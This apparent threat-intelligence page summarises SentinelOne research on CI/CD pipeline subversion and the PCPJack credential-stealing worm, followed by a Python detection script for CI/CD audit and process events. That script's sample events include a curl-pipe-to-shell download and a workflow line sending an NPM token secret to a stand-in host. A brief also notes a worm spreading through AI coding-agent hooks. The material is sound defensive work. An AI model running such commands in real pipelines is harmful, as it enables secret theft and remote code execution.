ctipilot.ch

SentinelOne — Living Off the Pipeline CI/CD subversion taxonomy with three case studies (TeamCity / GitLab service-account / Contagious Interview)

campaign · research:sentinelone-living-off-the-pipeline-2026

  • Coverage timeline: 1 · first 2026-05-16 → last 2026-05-16
  • Briefs: 1 (1 distinct)
  • Sources cited: 14 (5 hosts)
  • Sections touched: 1 (research)
  • Co-occurring entities: 5 (see Related entities below)

Story timeline

  1. 2026-05-16 · CTI Daily Brief — 2026-05-16 · research
     First coverage. SentinelOne taxonomy of CI/CD subversion: TeamCity CVE-2023-42793 backdoor undetected 12+ months; GitLab service-account → malicious Ansible playbooks; Contagious Interview fake-job-offer chain; Sha1-Hulud runner-registration pattern (predates Mini Shai-Hulud); detection priorities for runner registrations, suspicious child processes, secrets injection.

Where this entity is cited

  • research (1)

Source distribution

  • attack.mitre.org: 5 (36%)
  • nvd.nist.gov: 5 (36%)
  • sentinelone.com: 2 (14%)
  • securityweek.com: 1 (7%)
  • thehackernews.com: 1 (7%)

Related entities

All cited sources (14)

Items in briefs about SentinelOne — Living Off the Pipeline CI/CD subversion taxonomy with three case studies (TeamCity / GitLab service-account / Contagious Interview) (3)

SentinelOne: "Living Off the Pipeline" — CI/CD subversion taxonomy with three real intrusion cases (TeamCity, GitLab service-account pivot, Contagious Interview) [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-16 · published 2026-05-16 · view item permalink →

SentinelOne published on 2026-05-15 a practitioner-focused taxonomy of CI/CD pipeline subversion techniques, illustrated with three real intrusion case studies that are immediately useful for SOC and DevSecOps teams running JetBrains TeamCity, GitLab, or GitHub Actions (SentinelOne, 2026-05-15).

  • Case 1: an unpatched TeamCity server (CVE-2023-42793) exploited to deploy backdoors via privileged build tasks, remaining undetected for 12+ months.
  • Case 2: a GitLab service-account token compromise enabling creation of malicious Ansible playbooks that were then automatically executed by pipelines, a clean demonstration of how service-account over-privilege translates directly into production code execution.
  • Case 3: the Contagious Interview campaign using fraudulent job offers directing developer victims to fake skill-assessment sites that deploy malware silently to developer workstations.

Additional vectors covered include attacker-registered self-hosted runners, workflow triggers from repository discussion comments, dependency poisoning with reconnaissance preinstall scripts, and maintainer-account compromise appending malicious code; the article cross-links a separate SentinelOne analysis of the "Sha1-Hulud" NPM compromise as a related supply-chain case.

MITRE ATT&CK: T1195.002, T1547 (rogue runner registration as persistence), T1555 (pipeline secret extraction), T1204 (user execution via fake job-offer social engineering), T1072 (software-deployment-tool abuse via Ansible).

Defender monitoring priorities surfaced in the report:

  • GitHub / GitLab audit logs for runner.registered events with unfamiliar names or unexpected source IP ranges;
  • new or modified pipelines authored by service accounts;
  • suspicious child-process spawn from build agents (cmd.exe, powershell.exe, curl, wget outside baseline);
  • credential-access and reverse-tunnel traffic originating from build infrastructure;
  • secret-injection patterns in workflow-config modifications.
Single-source — SentinelOne only.
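The monitoring priorities in the item above, expressed as a small triage script that runs over audit and build-agent process events. This is an added example, not SentinelOne's code and not part of the brief. The sample events are constructed, and the field names (action, actor, actor_ip, runner_name, path, added_lines, parent_image, image), the `runner.registered` action string taken from the brief, the runner naming convention, the registration network, the service-account list and the baseline child-process set are all assumptions: GitHub and GitLab record runner registration and file changes under their own action names and JSON shapes, so map these onto your real audit-log schema and estate baseline before use.

```python
"""Triage of CI/CD audit and build-agent process events for the five monitoring
priorities above. Added example, not SentinelOne's code. The events below are
constructed, and the field names are assumptions loosely modelled on GitHub/GitLab
audit-log JSON and generic EDR process telemetry."""
import ipaddress
import re

# Hypothetical environment baseline: adjust to the estate being monitored.
RUNNER_NAME_RE = re.compile(r"^ci-(linux|win)-\d{2}$")       # runner naming convention
RUNNER_NETS = [ipaddress.ip_network("10.20.0.0/16")]         # where runners may register from
SERVICE_ACCOUNTS = {"svc-deploy", "svc-ansible"}             # non-human identities
BUILD_AGENT_PARENTS = {"Runner.Worker", "gitlab-runner", "TeamCityAgent"}
BASELINE_CHILDREN = {"git", "node", "npm", "python", "dotnet", "ansible-playbook"}
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe", "curl", "wget", "bash", "sh"}

SECRET_REF_RE = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")   # GitHub Actions secret expression
NET_TOOL_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b")
ENV_DUMP_RE = re.compile(r"\b(env|printenv|set)\b\s*(\||>)")   # dumping the job environment


def is_pipeline_path(path):
    """Files whose modification changes what the pipeline will execute."""
    return path.startswith((".github/workflows/", "playbooks/")) or path.endswith(".gitlab-ci.yml")


def triage_runner_registration(ev):
    """Priority 1: runner registrations with off-convention names or unexpected source IPs."""
    if ev.get("action") != "runner.registered":
        return []
    findings = []
    name = ev.get("runner_name", "")
    if not RUNNER_NAME_RE.match(name):
        findings.append(("RUNNER_NAME", f"runner name off-convention: {name!r} by {ev.get('actor')}"))
    src = ev.get("actor_ip")
    if src and not any(ipaddress.ip_address(src) in net for net in RUNNER_NETS):
        findings.append(("RUNNER_SRC", f"runner {name!r} registered from unexpected source {src}"))
    return findings


def triage_pipeline_change(ev):
    """Priorities 2 and 5: pipeline/playbook files changed by service accounts, and
    secret-injection patterns (a secret expression handed to a network tool, or an
    environment dump) in the added lines of the change."""
    if ev.get("action") not in {"file.created", "file.modified"}:
        return []
    path = ev.get("path", "")
    if not is_pipeline_path(path):
        return []
    findings = []
    if ev.get("actor") in SERVICE_ACCOUNTS:
        findings.append(("SVC_PIPELINE_EDIT", f"{path} changed by service account {ev['actor']}"))
    for line in ev.get("added_lines", []):
        if (SECRET_REF_RE.search(line) and NET_TOOL_RE.search(line)) or ENV_DUMP_RE.search(line):
            findings.append(("SECRET_INJECTION", f"{path}: {line.strip()!r}"))
    return findings


def triage_process(ev):
    """Priority 3: children of build-agent processes outside the baseline."""
    if ev.get("action") != "process.start" or ev.get("parent_image") not in BUILD_AGENT_PARENTS:
        return []
    child = ev.get("image", "")
    if child in BASELINE_CHILDREN:
        return []
    rule = "AGENT_CHILD_HIGH" if child in HIGH_RISK_CHILDREN else "AGENT_CHILD_NEW"
    return [(rule, f"{ev['parent_image']} spawned {child}: {ev.get('cmdline', '')!r}")]


def triage(events):
    """Run every rule over every event; returns (rule_id, message) pairs in event order."""
    findings = []
    for ev in events:
        for rule in (triage_runner_registration, triage_pipeline_change, triage_process):
            findings.extend(rule(ev))
    return findings


# Constructed sample events (not real logs). 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"action": "runner.registered", "actor": "alice", "actor_ip": "10.20.4.17",
     "runner_name": "ci-linux-07"},
    {"action": "runner.registered", "actor": "svc-deploy", "actor_ip": "203.0.113.44",
     "runner_name": "DESKTOP-4F2K"},
    {"action": "file.modified", "actor": "svc-ansible", "path": "playbooks/deploy.yml",
     "added_lines": ["    - name: stage", "      shell: curl -s http://203.0.113.9/x | sh"]},
    {"action": "file.modified", "actor": "bob", "path": ".github/workflows/build.yml",
     "added_lines": ['      - run: curl -d "${{ secrets.NPM_TOKEN }}" https://203.0.113.9/',
                     "      - run: env | base64"]},
    {"action": "process.start", "parent_image": "Runner.Worker", "image": "node",
     "cmdline": "node build.js"},
    {"action": "process.start", "parent_image": "gitlab-runner", "image": "curl",
     "cmdline": "curl -s http://203.0.113.9/x | sh"},
]

if __name__ == "__main__":
    for rule_id, msg in triage(SAMPLE_EVENTS):
        print(f"[{rule_id}] {msg}")
```

Run stand-alone, the script reports six findings for the sample: the off-convention runner name and its out-of-range registration source, the playbook edited by a service account, the two secret-injection lines in the workflow change, and curl spawned under gitlab-runner. The legitimate runner registration and the baseline node child produce nothing. The fourth priority in the list (credential-access and reverse-tunnel traffic from build infrastructure) is a network-telemetry check and is deliberately not modelled here.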

TeamPCP → PCPJack — cloud-worm successor evicting prior operator artefacts

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

Current state: SentinelLabs documented PCPJack on 2026-05-07 as a worm-class framework that evicts and deletes existing TeamPCP artefacts on compromise (giving the framework its name), then deploys six Python modules harvesting credentials from Docker, Kubernetes, Redis, MongoDB, RayML, and dozens of cloud / SaaS services (AWS, Azure, GCP, GitHub, Slack, HashiCorp Vault, 1Password). Propagation targets are pulled from Common Crawl Parquet files rather than ad-hoc scanning, a far broader and more curated attack surface than typical opportunistic worms work from. Weaponises five public CVEs simultaneously (CVE-2025-29927 Next.js, CVE-2025-55182 React2Shell, CVE-2026-1357 WPVivid, CVE-2025-9501 W3 Total Cache, CVE-2025-48703 CWP). The TeamPCP → PCPJack succession overlay is the operational specific worth tracking: SentinelLabs explicitly states there is no evidence yet of a direct operator-level connection, while the eviction logic implies operators familiar with TeamPCP's target population. Defenders running self-hosted Next.js, React-server-actions stacks, WordPress with WPVivid Backup or W3 Total Cache, or CentOS Web Panel with internet-reachable FileManager should treat all five CVEs as actively weaponised (SentinelLabs, 2026-05-07 · The Hacker News, 2026-05-07 · SecurityWeek, 2026-05-08 · daily 2026-05-10). The earlier TeamPCP "Mini Shai-Hulud" SAP CAP npm worm (covered 2026-05-06) used Claude Code SessionStart hooks and VSCode tasks for propagation; that thread is separate from PCPJack's CVE-chain propagation, but the same operator population is tracked.

PCPJack — modular cloud-credential-theft worm displaces TeamPCP using five public CVEs and a multi-cloud key-harvesting pipeline

From CTI Daily Brief — 2026-05-10 · published 2026-05-10 · view item permalink →

SentinelLabs documented PCPJack on 2026-05-07, a worm-class framework that propagates across exposed cloud and web infrastructure by chaining five public CVEs simultaneously: CVE-2025-29927 (Next.js middleware authorisation bypass via crafted header), CVE-2025-55182 ("React2Shell", Server Actions deserialisation in React/Next.js), CVE-2026-1357 (unauthenticated file upload in WPVivid Backup), CVE-2025-9501 (PHP injection in W3 Total Cache via the mfunc comment processor) and CVE-2025-48703 (shell injection in the CentOS Web Panel FileManager) (SentinelLabs, 2026-05-07 · The Hacker News, 2026-05-07 · SecurityWeek, 2026-05-08).

The bootstrap shell script first evicts and deletes existing TeamPCP artefacts from the host (giving the framework its name), then deploys six Python modules covering credential extraction from Docker, Kubernetes, Redis, MongoDB, RayML, and dozens of cloud / SaaS services (AWS, Azure, GCP, GitHub, Slack, HashiCorp Vault, 1Password). Second-stage tooling drops Sliver C2 beacons.

Exfiltration uses Telegram channels with ChaCha20-Poly1305 encryption; propagation target lists are pulled from Common Crawl Parquet files rather than scanned ad-hoc, which gives the campaign a far broader and more curated attack surface than typical opportunistic scanning. Unlike TeamPCP and TeamTNT which monetise via cryptominers, PCPJack drops no miner — SentinelLabs assesses monetisation as credential fraud, spam, access resale, or extortion (SentinelLabs, 2026-05-07). SentinelLabs notes TTP overlap with TeamPCP and frames PCPJack as a possible former affiliate or breakaway operation. Defenders running self-hosted Next.js, React-server-actions stacks, WordPress with WPVivid Backup or W3 Total Cache, or CentOS Web Panel with internet-reachable FileManager should treat all five CVEs as actively weaponised.